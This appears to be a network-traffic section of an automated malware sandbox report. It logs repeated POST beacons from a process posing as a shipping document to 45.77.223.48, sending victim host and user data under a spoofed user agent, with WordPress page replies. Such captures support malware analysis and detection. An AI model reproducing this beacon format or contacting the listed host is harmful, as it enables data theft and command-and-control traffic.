                                              Apr 25, 2024 09:42:56.945918083 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:56.946613073 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:56.946772099 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:56.946878910 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:56.947030067 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              46192.168.2.44979645.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:57.200453997 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:57.331301928 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:58.137273073 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:57 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:58.137542009 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:58.137554884 CEST11INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09
                                              Data Ascii: UTF-8" />
                                              Apr 25, 2024 09:42:58.137590885 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:58.146480083 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:58.146853924 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:58.146893024 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:58.147001982 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:58.147505045 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:58.147531986 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              47192.168.2.44979745.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:58.404315948 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:58.535094976 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:59.476314068 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:58 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:59.476459980 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:59.486028910 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:59.486440897 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:59.486558914 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:59.486702919 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:59.486818075 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:59.486874104 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:59.486969948 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 25, 2024 09:42:59.487020016 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                              Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              48192.168.2.44979845.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:59.746040106 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:59.876717091 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:00.707429886 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:59 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:00.707573891 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:00.707585096 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:00.716109991 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:00.716623068 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:00.716753960 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:00.716891050 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:00.717068911 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:00.717113018 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:00.717204094 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              49192.168.2.44979945.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:00.985732079 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:01.119400024 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:01.951961994 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:01 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:01.952116966 CEST22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
                                              Data Ascii: <!DOCTYPE html><html
                                              Apr 25, 2024 09:43:01.952295065 CEST12INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22
                                              Data Ascii: lang="en-US"
                                              Apr 25, 2024 09:43:01.952439070 CEST25INData Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: ><head><meta charset="
                                              Apr 25, 2024 09:43:01.952745914 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:43:01.952931881 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:43:01.953176022 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:01.963268995 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:01.963939905 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:01.964215040 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              50192.168.2.44980045.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:02.240601063 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:02.368654013 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:03.218880892 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:02 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:03.218997955 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:03.219140053 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:03.228153944 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:03.228506088 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:03.228638887 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:03.228804111 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
